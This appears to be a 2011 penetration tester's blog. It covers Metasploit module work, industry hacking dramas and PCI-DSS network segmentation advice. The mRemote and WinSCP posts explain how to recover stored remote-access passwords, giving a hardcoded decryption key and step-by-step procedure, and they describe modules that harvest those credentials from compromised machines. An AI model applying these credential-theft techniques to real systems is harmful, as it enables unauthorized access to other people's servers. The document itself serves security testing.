Well, i know i have been pretty quiet lately, so I thought i'd provide an update. I am very tempted to try and stake a claim on one of the Metasploit bounties , but I don't think I'm quite up to that challenge yet. Instead i will continue to work on some of my other Metasploit Projects:


  1. Build Railgun support for the Windows Crypto API(CAPI)
  2. Finish my SmartFTP password recovery module
  3. Build Meterperter NetStat support for Windows
  4. Some other things that have not solidifed yet.
I hope to get those first 3 items completely done in the next month or so. I want to have them completed and committed before Black Hat. It looks like i will be attending Black Hat courtesy of Rapid 7 this year, but only for the briefings. I unfortunately do not have the means at my disposal to stay for DefCon this year. I look forward to meeting some people in person.

Thursday 2 June 2011

Stealing Passwords from mRemote

If you don't know mRemote is a tabbed remote connection manager for Windows. It can store and manage a number of different connections, chief among them RDP,VNC, and SSH. It is a popular tool among IT Support people who have to remote into a lot of machines.

When you save connections in mRemote it outputs all of that data into an XML report in your local AppData folder. The passwords are saved in an encrypted format, however this is trivial to circumvent. The passwords are encrypted with AES-128-CBC Rijndael Encryption, and then the IV is pre-pended to the encoded passwords and the whole thing is base64 encoded for output into the XML. The encryption key that is used is the md5 hash of the string "mR3m". So to decrypt these passwords we follow a simple process:

example password:  28kQ15DF4kdW34Mx2+fh+NWZODNSoSPek7ug+ILvyPE=

  1. Get the md5 hash of mR3m and convert it into byte values: \xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c
  2. base64 decode the saved password data
  3. Take the first 16 bytes of the decoded data and set that as you Initialization vector(IV)
  4. Run AES-128-CBC Decryption feeding your Cipher Text(the remaining bytes from the decoded text), your IV (that first 16 bytes), and your key (\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c)
  5. You should get a decrypted password of: password1
Simple and easy, you are now ready to decrypt all of those delicious RDP,VNC, and SSH passwords. To make it all that much easier I have written a new Metasploit POST module that will find the XML files on a compromised machine and decrypt those passwords for you. I just submitted it to Redmine so it hasn't been added yet, but keep your eyes peeled. I suspect it will be in there soon.

Sunday 1 May 2011

Metasploit Meterpreter Registry OpenKey and VNC PW Module

As you probably already know I've been doing some work with Metasploit post modules. This recent work has focused heavily on Registry functions. While doing this work I noticed a disturbing behavior. When Meterpreter checks to see if a key exists it was calling RegCreateKey instead of RegOpenKey.  RegCreateKey will attempt to create any and all keys in the supplied path that do not already exist. RegOpenKey, however, will not create the key if it doesn't already exist.

In Metasploit the registry.rb 'client-side' function is set up as a wrapper to the create_key function. Similarly the registry.c code for Meterpreter itself is set up this way. Calls to the OpenKey function were just passed on to the create_key function. I have now submitted a patch to correct this behaviour. The registry.rb function now sends a call via the meterpreter stdapi to the request_registry_open_key function. The request_registry_open_key function will appropriately call RegOpenKey instead. If/when this patch is accepted by the Metasploit team, it will make the Registry functions of Meterpreter much less invasive/noisy.


I have also gone ahead and submitted a patch for the enum_vnc_pw Post Module. The module as it currently stands will check the HKEY_Current_User keys for user-mode vnc passwords. However, this will only work if meterpreter is running udner the permissions of the user who is running the vnc server. I have added behaviour that will try to enumerate all userswith SIDs in HKEY_Users and then check each one that it can access, to see if it has stored VNC passwords. The get_reg function also had to be re-written to deal with possibile permissions issues if meterpreter does not have rights to access each users' registry. The best way to run this module will, of course be under SYSTEM priveleges as it will have access to every user. This will hopefully make the enum_vnc_pw module more effective at gathering it's data.

Friday 29 April 2011

Sony PSN Hack: Leave GeoHot out of it

So I wandered by Geohot's latest place of residence today. I thought his posting was very well written and very nicely defined his stance. His work on opening up homebrew software on the PS3 was not aimed at enabling piracy, and he does not support or condone the PSN hack in any way. Despite this, he is flooded by comments blaming him either directly or indirectly for the hack. The level of ignorance in this matter is astounding. After two decades on the internet, you'd think I would not be surprised at this point, but I still am. I suppose i just can't shake this pesky hope in humanity.

I want to lay this out in terms that, hopefully, even the dumbest internet denizen can understand:


  1. George Hotz , Fail0verflow and any other Homebrewers did not support this attack. Their work was aimed to restore functionality that was stripped away from devices that they had bought specifically for that functionality. I wonder how many people would have bought a 360 instead of a PS3 if Sony hadn't advertised the OtherOS functionality. It was certainly one of the reasons I bought my first PS3. George hotz and these others did not perpetrate this attack
  2. There is no evidence that this attack even had anything to do with the homebrew console debate. Consider the following. 
  • If this was about revenge or embarrassing Sony, the attack would need to be public as quickly as possible to try and prevent Sony from sweeping it under the rug. 
  • Nobody has come forward to take responsibility for the breach. Instead the information leaked out from Sony inevitably as they shut down their own service to get a handle on the Incident.
  • The breach targeted customer data including PII(Personally Identifiable Information) and potentially Credit Card Data. These are high value targets monetarily
  • The above mentioned lack of disclosure/credit taking is more indicative of someone looking to steal this data and sell it for profit
  • Some will try to argue that the attacker could have expected Sony to disclose the breach but that has two huge gaping holes. First, if Sony's security was poor enough to let the breach happen in the first place, why should there be any expectation that they have proper safeguards in place to alert them to the breach. They obviously believed they had no reason to ever expect an attack like this. Secondly, why assume Sony would even admit to the breach. Plenty of companies suffer these kinds of breaches and do not report them. It happens a lot more than you might think.

The point is, that there is no evidence to support the idea that this has anything to do with the home brew console debate. In fact the little bit of evidence we have so far points to a common data theft. To all of you people who are jumping on anonymous or any other media buzz right now, do some reading. these sorts of breaches happen all the time. This breach was essentially inevitable as long as Sony failed to correct the security flaws in their system. If you want somebody to blame you have two parties to go after: Sony, and the people who actually stole your data. Plenty of blame to go around, you can leave GeoHot out of it.

Wednesday 27 April 2011

Stealing WinSCP Saved passwords

WinSCP is a popular SCP and SFTP client for Windows. Users of this tool have the option of storing 'sessions' along with saved passwords. There is an option within WinSCP to encrypt these password with a 'Master password'. This means the stored passwords will be AES256 encrypted. However, this option is NOT turned on by default. There are two ways these sessions will be stored by WinSCP.  The default behavior is to save them in the registry. They will be stored under HKEY_Current_User\Software\Martin Prikryl\WinSCP 2\Sessions.  The other option is to store them in an INI file, which will be located in the WinSCP install path.

When no master password is set, it is trivial to reverse the 'encryption' used on the stored passwords. It is a simple series of bitwise operations, using the username concatenated with the host name as sort of pseudo-key. To simplify the process of stealing these passwords I have created a Metasploit Post module /modules/post/windows/gather/enum-winscp_pwds.rb which was committed in the latest revision.

Once again, I am pleased to be contributing to the Metasploit project. I want to take a moment to especially thank egyp7, hdm, and jduck for their help and support. they put up with a lot of dumb questions while I was working on this module. it is only the third one I have created and the second to get committed. The Metasploit team is an amazing group of people to work with. They freely share their knowledge and experience and make Metasploit truly a community driven project, instead of just another piece of OSS. I look forward to continuing to contribute to the Metasploit project.

Tuesday 12 April 2011

Updated Metasploit wishlist

A little while ago i posted my Metasploit Wishlist. i have pulled a new updated copy of this list, and added a Category field to help sort through it a little easier. I'll be spending some of my spare time going through this list and picking out things to port over. My first go around was a success and my first ported module:
http://metasploit.com/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid

was committed. It may have been a little sloppy but i look forward to getting better as I go on. Mark my words, I'm going to get my name on that front page list.

Here's the new list

Tuesday 15 February 2011

Of Hacks, Leaks, and Legal Battles : Is anyone really winning?

In recent days we have seen what seems like an escalation in the battle for the Information Age.  These events are far from new, however they have taken on a more fevered pitch. I suppose it probably started with the whole WikiLeaks-Bradley Manning thing. This started quite a fierce fight both off and on the internet.  A fierce debate with highly polarized sides sprang up around the issue of WikiLeaks.

Into that fray jumped Anonymous. They took their own unique sense of purpose and went after anyone whom they felt had wronged WikiLeaks. This included attacks on Paypal,MasterCard and others. They took time off from their busy schedule of attacking PirateBay opponents around the world. These sorts of things are not all too uncommon, especially when dealing with Anon. They have made the news in the past. What was different this time was that there was already a frenzy around the wikiLeaks issue.

Soon a new subset appeared. This group would have us believe that they are independently operating patriotic hackers, such as th3j35t3r. I have my doubts as to how independent these folks really are. These people went after anonymous, wikileaks and anyone else supporting them. A sort of mini-cyberwar started. What I would like to note is interesting is that the US Department of Justice launched an immediate investigation into Anonymous to try and make arrests over their DoS attacks. However the sophisticated DoS attack that was carried out against wikileaks was just as illegal and yet the government remains silent on the subject.

The fighting and debating raged on around wikileaks. Many things occurred during the next several months that i don't feel the need to recap. Fast forwarding to the past few weeks. Aaron Barr, CEO of HBGary Federal made an announcement that he had 'infiltrated' Anonymous and discerned the true identities of the Anon leadership. (This statement alone seems to show a misunderstanding of the true nature of Anonymous, but look at some of my earlier posts for some of my theories on this subject). Aaron Barr apparently sought to use this information to leverage himself and his company into a bit of the spotlight. Allegedly, Barr was going to sell this information to the FBI.

In response a few members of anonymous launched an assault on HBGary federal during the super bowl. In short order they ahd compromised systems inside HBGary Federal, took control of rootkit.com, seized Aaron Barr;'s twitter account and the social networking accounts of several other folks at HBGary. They stole a large number of emails from the company, and allegedly wiped out HBGary's backups.

The initial assault left HBgary reeling and embarrassed like a kid who gets pants-ed at the bus stop. It got worse from there though. Amongst the stolen emails was a document supposedly composed by HBGary Federal and Palantir. The target audience was allegedly Bank of America. The subject matter? How to destroy wikileaks. The document details disinformation campings, smear attacks against pro-wikileaks journalists, Denial of Service attacks against wikileaks infrastructure, and attempts to infiltrate the group to discover the identities of document submitters. You can see a copy of the document here. BofA and Palantir began moving quickly to conduct damage control disavowing any knowledge of the document or its creation. Additional documentation has surfaced to cast doubts on some of these claims.

The lesson here so far? Even a security firm like HB Gary can get thoroughly spanked on the internet by not taking threats seriously. The damage to their company by these leaks is yet to be seen, but other companies are already cutting ties to try and protect themselves. In this case the Leak has already proven to be an effective weapon against a powerful company.



Meanwhile, another little drama was unfolding. The Gregory Evans/ Ligatt Security drama. Gregory Evans has been accused of being a charlatan for a while. He made claims of being the 'world's no 1 Hacker'. A ridiculous, and pompous proclamation if ever I've heard one. He released a book on how to become the world's no 1 hacker. A book which was quickly accused of large scale plagarism. Evans denied these accusations, and at one point claimed that he paid any third part content writers for their material. I do not know about the vast majority of this claim. However, Chris Gates, aka carna0wnage was one of the authors whose material appeared in the book. Gates denied ever receiving any payment or giving permission to Evans to use his material in the book. The material is so obviously ripped off, Evans even sued the same screenshots which include Chris Gates' name in the login prompts.

Enough about the gory details though. Suffice it to say, the Evans/Ligatt drama continued on. Evans fought back in the only way he seems to know how. He filed lawsuits. He filed quite a few lawsuits actually. He tried suing anyone and everyone he could that has ever said anything bad about him on the internet. Most of these lawsuits have failed completely, but that didn't stop Evans. Recently, on Gregory Evans' birthday, his email and twitter accounts were hacked. All of his email was leaked into a torrent on the internet and distributed. Since the leak of his email, one embarrassing piece of evidence after another surfaces from the spool.  Many of these documents were reposted to the LigattLeaks blog, which was originally hosted on WordPress.  Evans and Ligatt sent take-down demands to wordpress and the registrar for LiogattLeaks.org. Wordpress capitulated in the face of any possible legal ramifications, whether there was solid legal basis or not.

LigattLeaks has since moved on to a site at http://ligattleaks.blogs.ru and continues to post with impunity. Since LigattLeaks themselves claim they do not possess the mailspool and are only reposting things found on pastebin, they seems to be under no legal liability. The actual consequences of these leaks for Evans or Ligatt? Aside from a lot of embarassment, and a local news story , there has yet to be any serious consequence seen from this. however, Evan's litigious assaults on the infosec community seemed to have had no real effect either. So right now I'm calling this one a draw at the moment.

Now let's move on to the Sony PS3 case. The folks over at Fail0verflow got their hands on the keys used to sign software for the ps3. Well known hardware hacker GeoHot then built on this and created a modkit to allow home brew software to run on the ps3. Sony claims that this will only serve to enable piracy on their game consoles. they file suit against Geo Hot, subpoena all of his computer equipment and issue orders for his instructional videos to be stripped from the internet. In response the instructions, examples, and encryption keys are spread across the internet. Before the case against Geohot has even begun, sony is now trying to use the legal system to gain information on every person who viewed or commented on GeoHot's video on youtube. They are also seeking legal action against anyone who posts the encryption keys. This drama is still under way but I'm going to go ahead and call it now: Sony will lose, no matter what the trial outcome.

There is already a huge public outcry against Sony over this action. They may have already caused themselves irreparable brand damage. They have increased the actual awareness of these hacks. And there is no way that they can successfully suppress the information once it has begun disseminating through the internet. They are trying to stuff the proverbial Geenie back in the bottle. One has to wonder why they are doing this. They will not be able to recoup any significant losses. they won't be able to suppress the information. They are trying to lay down intimidation tactics. These intimidation tactics are of course having the opposite effect. One has to wonder if anonymous or another group won't turn it's attention towards the Sony mega-corporation. It would be very itneresting to see a battle between Anonymous and such a  huge company.


There are three examples of folks in the Corporate world trying to control and shape the Internet for their own benefit. All of them are failing miserably, and they are all starting to pay a heavy price for it.

Friday 11 February 2011

PCI-DSS : You gotta Keep Em Separated!

I turn to the Offspring for a bit of lyrical wisdom in terms of my latest PCI-DSS ramblings. All humour aside, please pay attention to what I am about to tell you. I cannot stress this enough:
The number one thing you should focus on for PCI-DSS is Network Segmentation. If you do not employ proper network segmentation, your PCI compliance efforts will be painful at the best, and a disaster at the worst.

Maybe your company already handles HIPPA/HITECH  or SOX. Maybe you have had some other security initiatives running for a while. That's great. PCI-DSS is a very different game, and if you don't segment your network, you will drown in work. 

You may have other confidentiality requirements in place. You may be tempted to place HIPPA Data or sensitive financial data in the same network segments as your PCI data. I am telling you now, resist that temptation. It may seem like a perfectly reasonable approach, but it should be avoided if possible.
With proper segmentation of your networks, you give yourself the opportunity to approach your goals in a phased risk-based approach. This will help maximize your efficiency when try to achieves these goals, and will also ensure that you are adding the most possible security benefit at each step of the process.

Completion of this Network Segmentation depends upon some sort of systems Inventory Process. You need to be aware of exactly what is in your environment, how they interact, and what their roles are. Without this, you will fail to segment your network properly and will never be able to truly add meaningful security as a whole.
Let's say that you have three primary Information Security concerns. PCI,HIPPA, and SOX. This means you are concerned with 4 primary data classifications:
1.PCI Data (Credit Card #s , Expiration Dates, CCVs etc)
2.PII/HIPPA Data ( Any personally identifieable information and healthcare data)
3.Financial Reporting Data
4.Everything Else
Let's talk about a perfect scenario where you are a fairly sizable company, and you have a solid budget for this security initiative you are undertaking. That being said, we will go ahead and break down #4 into some additional categories that will help with your overall security posture

1.Critical Infrastructure (Servers and Network Devices that are responsible for core business applications and services. i.e. Email, Telephony, Primary Line of business applications etc)
2.Desktop Ranges (where all of your users should be sitting)
3.QA/DEV Environments (Even if you are not doing any in-house development, you should have some QA environments to test things like configuration changes. Keeping these separate is important for a number of reasons we will get into later)
4.Non-Critical systems (everything else)
So now we essentially have 7 distinct areas mapped out. Let's talk a bit more about each of these areas.

PCI Data – This area will include any device that Stores, Processes, or Transmits Credit Card data as defined by the PCI-Council. In our scenario, this is the area that is going to be subject to some of the most stringent security requirements. This area should be strongly separated from all of the other regions, permitting as little contact between these networks and any others as possible. The rule of thumb should be Deny by Default. These hosts will all be subjected to regular vulnerability scanning and penetration testing efforts. Any applications hosted in this environment should be subject to source code review and Application Security Assessments.

Within the PCI environment, the hosts should be further separated where possible. Any external(Internet) facing Presentation layer should be strongly segmented away from the Application and Data layers. This is to try and mitigate the chances that your presentation layer will be sued as an entry vector deeper into the environment.

PII/HIPPA Data – This area is going to be a concern from a regulatory standpoint as well. However, HIPPA's guidelines on security requirements are nowhere near as stringent as those set forth by PCI. Your company should create a set of standards and ensure that they are applied against all hosts in this environment. These standards should include topics like Access Control, Encryption (transport and at rest), approved applications, approved services etc. The environment should be audited regularly to ensure that these standards are being upheld. Regular vulnerability scans should be a priority in this environment as well. Code Reviews, Application Security Assessments and penetration tests should be a goal, but should take a lower priority to completing these same tasks within the PCI environment.

It is possibly even more important that the External facing Presentation Layer be segmented off from the rest of the environment here. This is because any Internet facing hosts are in-scope for PCI external vulnerability scanning and penetration testing. If you do not segment the rest of the PII zone off, you can quickly find this entire zone considered in scope for PCI as well. This will mean that you will now be required to enforce the same standards on this environment that you do in the PCI Zone. This may not seem like a bad thing, but the work load can get out of hand quickly.

Financial Reporting Data – This is the zone where your SOX standards come into play. SOX is, in my experience, one of the most vague sets of standards out there. It mandates that Financial reporting data be secured to maintain accuracy and integrity. The big concern in this Zone can be summed up in a word : Accountability. If we apply the CIA model(Confidentiality, Integrity, Availability) to this Zone, we will see that Integrity is our number one concern, followed by Integrity, and Availability come in a very distant third.
What you should focus on:
·         User Account Management
·         Access Control
·         Auditing/Activity Monitoring
The focus here is going to be a lot more process oriented than technical. Ensure that user accounts are set up properly on all systems, with only the access they need. Make sure there is no sharing of accounts, or use of generic accounts. Make sure that activity on all Financial Reporting systems is logged for auditing to maintain maximum accountability.
Regular audits should be done on this zone to ensure all standards and policies are being properly observed within the zone.  Regular vulnerability scanning in this Zone may be a good idea, but is not a must. If time and resources allow Source Code Review, Application security Assessments, and Penetration Tests should be performed to help validate the security mechanisms in place.
Like the other zones, any Internet facing Presentation Layer should be segmented from the rest of the zone as much as possible. Remember, all Internet facing hosts are subject to PCI.
Critical Infrastructure – The separation of this Zone is probably going to be less dramatic than with the ones we’ve just discussed. It is still a good idea to tightly control the flow of data in and out of this zone though. Regular Vulnerability scans should be performed in this Zone, but only after the above Zones have reached a point in their maturity where the Vulnerability Management efforts are running smoothly. That will allow you to have time for working with System Admins on remediating any findings. Availability may be a much larger concern in this Zone than in some of the others. This zone represents the core of your operations and should be treated carefully. In addition to the Vulnerability Scans, Penetration Testing efforts are a very good idea in this zone.
Do I need to say it again? Any Presentation Layer facing the Internet needs to be additionally segmented. I think you’ve probably got this idea down pat by now.

Desktop Ranges – Desktop networks are a tricky subject. They should be segregated out as much as possible for a couple reasons. One is that you don’t want a compromise of the outer systems to be able to get into the Desktop networks and run amok. Secondly, you don’t want the opposite to happen. Desktop ranges are honestly going to be the most likely entry vector into your network. A lot of attacks on companies start by tricking users into going to web page, or opening a file that they shouldn’t.  If your desktop users have unfettered access, then it is game over.
I cannot stress the importance of applying standards here. Some chief things to think about when looking at standards for your Desktop networks:
1.       Approved Software – Make sure you know what software is safe to run on machines, and don’t allow any other software to be installed without authorization.
2.       Update management – Make sure that all approved software can be updated in a controlled and uniform manner.
3.       File Shares – In my experience as Penetration Tester, this is where you see the most heinous failures. Users often open up shares on their computers to trade files back in forth. The problem is that they do not necessarily know how to secure those shares properly
4.       Running Services – If your desktops are all running Windows Messenger or Chargen, you better have a good reason for it. Aside from these obvious concerns, also think about things like Remote Registry. Remote Registry allows for a lot of troubleshooting and remote administration, but it also opens potential security risks. Weigh the benefits and risks accordingly for your environment.
5.       Anti-virus – I don’t think I need to explain this.
6.       Account Policies – Password complexity, expiration, and lockout policies. Also policies on shared or generic accounts. This also applies to the Local Administrator account. If all of your Desktops run with the same local Admin password, it will only take one Desktop being compromised for this entire Zone to be in danger.
Vulnerability scanning on Desktop ranges is not an easy decision point. There are benefits and risks associated with this activity. As previously stated, the Desktops are going to be one of your most likely entry vectors for an attack. However Vulnerability scans can be potential disruptive, and if you are doing Authenticated scans, you may return a lot more results than you are going to want to look at. If you decide to do Authenticated Vulnerability scans, it will be very important that you have items 1 and 2 from above firmly in place first.
There really shouldn’t be anything to do in terms of Sources Code Review, or AppSec Assessments here.  Penetration Test efforts will almost certainly have a field day in this zone. If there is anything directly Internet facing in this Zone you have done something horribly horribly wrong!

Non-Critical infrastructure – Let’s jump to the ‘Everything Else’ group for a second. This is going to be all of your non-critical systems. These are the things that don’t handle sensitive data, and are not required for day-to-day operations to succeed. The separation of this zone should be defined by the separation and controls placed around all of the other zones. No additional work should be required for separating these hosts out. All of your security activities such as Vulnerasbility Scanning, Penetration Testing, AppSec  Assessments, and Code Reviews should all be  long term goals. Start working on these only after everything is running smoothly in all of these other zones. This is the point at which you’re just cleaning up the rest of the garbage in your Enterprise. If you get to the point where you are cleaning up this Zone you are well on your way to the sustainment phase of your overall Security Initiative.
QA/DEV Systems – QA and DEV environments are a quagmire. The best advice I can give you is as follows.
·         Separate QA and DEV out from the rest of your environment as much as possible.
·         Try to avoid any contact between QA/DEV and the internet.
·         Do not ever allow real production data to reside within a QA or Development Zone.
·         Do NOT Vulnerability Scan your QA and Dev environments. These zones will be extremely volatile, and will be in a  constant state of flux. You will be bogged down chasing vulnerabilities that disappear and reappear at random. If you have segregated these zones appropriately, there is nothing to be gained from Penetration Testing or Vulnerability Scanning in this Zone. Save yourself the headache.

Below is a crude diagram to try and help illustrate this concept. Please note that this does not reflect actual firewall or network placement. It merely tries to illustrate the segmentation.